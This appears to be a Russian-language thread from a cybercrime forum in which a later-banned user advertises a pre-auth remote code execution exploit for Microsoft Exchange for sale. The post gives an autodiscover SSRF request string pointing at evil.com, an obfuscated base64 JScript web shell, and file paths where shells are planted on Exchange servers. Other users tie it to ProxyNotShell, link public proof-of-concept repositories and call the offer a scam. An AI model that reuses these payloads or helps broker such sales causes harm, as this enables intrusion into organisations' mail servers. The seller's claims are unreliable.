• XSS.stack #1 – первый литературный журнал от юзеров форума

Продаю 0day RCE Pre-Auth для Microsoft Exchange

В этой теме можно использовать автоматический гарант!

Новая сделка
Статус
Закрыто для дальнейших ответов.
Отслеживать
Magellan Money

Magellan Money

CD-диск
Забанен
Регистрация
17.07.2022
Сообщения
19
Реакции
-9
Пожалуйста, обратите внимание, что пользователь заблокирован
Привет всем потенциальным покупателем, сразу озвучу условия продажи:

№1. Только через гаранта!
№2. Только в одни руки! (Определяется кол-во владельцев)
№3. Только дорого!

Предлогайте цену в ПМ, пишите сразу контакты, те кто серьезно настроен всегда договоримся.

Пример RCE
autodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@example.com

RCE inplementation

Js code:

<%@Page Language="Jscript"%> <%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('NTcyM' +'jk3O3'+'ZhciB'+'zYWZl'+''+'P'+'S'+char(837-763)+ System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MQ==')) +char(51450/525)+''+''+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250) +System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Wg==')) +'m'+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydF'+'WjBXS'+'WFtRG'+'Z6bU8'+'xajhk' +'J10sI'+'HNhZm'+'UpOzE'+'3MTY4'+'OTE7'+'')));%>



Files inject
RedirSuiteServiceProxy.aspx C:\ProgramFiles\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth
Xml.ashx C:\inetpub\wwwroot\aspnet_client
pxh4HG1v.ashx C:\ProgramFiles\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth

Если коротко, то уязвимость дает привелегию повышения прав в Microsoft Exchanger.

photo1664737299.jpegphoto1664739931-2.jpegphoto1664739931.jpeg


Ваши контакты и стоимость в ПМ!
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
FREEM4N сказал(а):
Твой эксплоит работает, задействуя -> CVE-2022–41040 and CVE-2022–41082 ? Или ты продаешь что то иное?

Подробнее тут -> https://doublepulsar.com/proxynotsh...d-zero-day-in-microsoft-exchange-5c63d963a9e9
100% то же самое

<%@Page Language="Jscript"%>

<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('NTcyM'+'jk3O3'+'ZhciB'+'zYWZl'+''+'P'+'S'+char(837-763)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MQ=='))+char(51450/525)+''+''+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Wg=='))+'m'+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydF'+'WjBXS'+'WFtRG'+'Z6bU8'+'xajhk'+'J10sI'+'HNhZm'+'UpOzE'+'3MTY4'+'OTE7'+'')));%>


Warning: New attack campaign utilized a new 0-day RCE vulnerability on Microsoft Exchange Server

www.gteltsc.vn


за исключением большого количества POC в ближайшие дни потому что уязвимость легко использовать
 
Пожалуйста, обратите внимание, что пользователь заблокирован
lose сказал(а):
100% то же самое



Warning: New attack campaign utilized a new 0-day RCE vulnerability on Microsoft Exchange Server

www.gteltsc.vn


за исключением большого количества POC в ближайшие дни потому что уязвимость легко использовать
Не тоже самое...

Пример, который я привел, это лишь пример функционала, а взял я его да как видно с гугла, потому что конфига раскрывать не хочу, потенциальных клиентам привожу факты и отличия моего продукта от того что ты тут льешь.
 
Проверил с помощью ТС'а продукт, в плане получил исчерпывающие ответы по отличиям между его конфигом и тем что есть, убедился что после патча он не слетит, в отличи от того который здесь указывают другие. Работать можно и не забывайте про гарант!
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Пожалуйста, обратите внимание, что пользователь заблокирован
Пожалуйста, обратите внимание, что пользователь заблокирован
Хорошо, давайте дождемся обновлений, всего чего вы там ждете, тема просуществует, просто цена будет потом еще выше, я здесь никому ничего не "впариваю", не доказываю, а крыс бегающих за халявой сразу за хвост рублю
 
Magellan Money сказал(а):
Хорошо, давайте дождемся обновлений, всего чего вы там ждете, тема просуществует, просто цена будет потом еще выше, я здесь никому ничего не "впариваю", не доказываю, а крыс бегающих за халявой сразу за хвост рублю
вот когда выкатят обновление, а это очень быстро будет, вот тогда и продемонстрируешь свой скрипт, а на данный момент нехуй пудрить людям мозг, и выкладывать х#й пойми что, а после обновления и покажешь конкретно боевую работу скрипта, так будет во первых логичнее, а для покупателей разумнее.


я здесь никому ничего не "впариваю", не доказываю -> твоя психологическая сторона почему то говорит об обратном особенно то что в ковычках.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Ладно дождемся, постараюсь сегодня-завтра снять демонстрацию - хейтеры люблю вас.
 
Выкатил пост после того как POC сплойты с гитхаба поудаляли
Код: 
https://github.com/0xR0o7/CVE-2022-41082-MASS-RCE
https://github.com/kev1n-beaum0nt/CVE-2022-41082-RCE-POC/blob/main/CVE-2022-41040.py
   https://twitter.com/GossiTheDog/status/1575983467292024832

Есть вероятность что продается паблик
Это также не отменяет того что експлойт будем рабочим, в теории)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
IIIIXX сказал(а):
Выкатил пост после того как POC сплойты с гитхаба поудаляли
Код: 
https://github.com/0xR0o7/CVE-2022-41082-MASS-RCE
https://github.com/kev1n-beaum0nt/CVE-2022-41082-RCE-POC/blob/main/CVE-2022-41040.py
   https://twitter.com/GossiTheDog/status/1575983467292024832

Есть вероятность что продается паблик
Это также не отменяет того что експлойт будем рабочим, в теории)
это вроде scam, там ссылочка на сатошидиск была как обычно
 
не вроде а так и есть, все скамы, где обещанные видосы и так далее
 
Последнее редактирование модератором:
Chui сказал(а):
не вроде а так и есть, все скамы, где обещанные видосы и так далее
если был бы скам, то зачем настаивать на гаранте?
ждем видос
 
Последнее редактирование модератором:
Пожалуйста, обратите внимание, что пользователь заблокирован
marti1n сказал(а):
если был бы скам, то зачем настаивать на гаранте?
ждем видос
мартин давай дождемся админа, потом все увидишь, я никому не доказываю, а нужным людям мне и не в падлу, но не пацаненку(ты понял о ком) который недавно сосал чупачупсы а теперь ты понял что на коленях
 
никакой серьезности, ты продаешь серьезный продукт, а в описании выложены скрины публичной директории nasa картинок, и китайский паблик дроппер, а какой ты реакции хочешь? Была бы серьезность этот скрипт вместе с тобой бы купили
 
Статус
Закрыто для дальнейших ответов.
Верх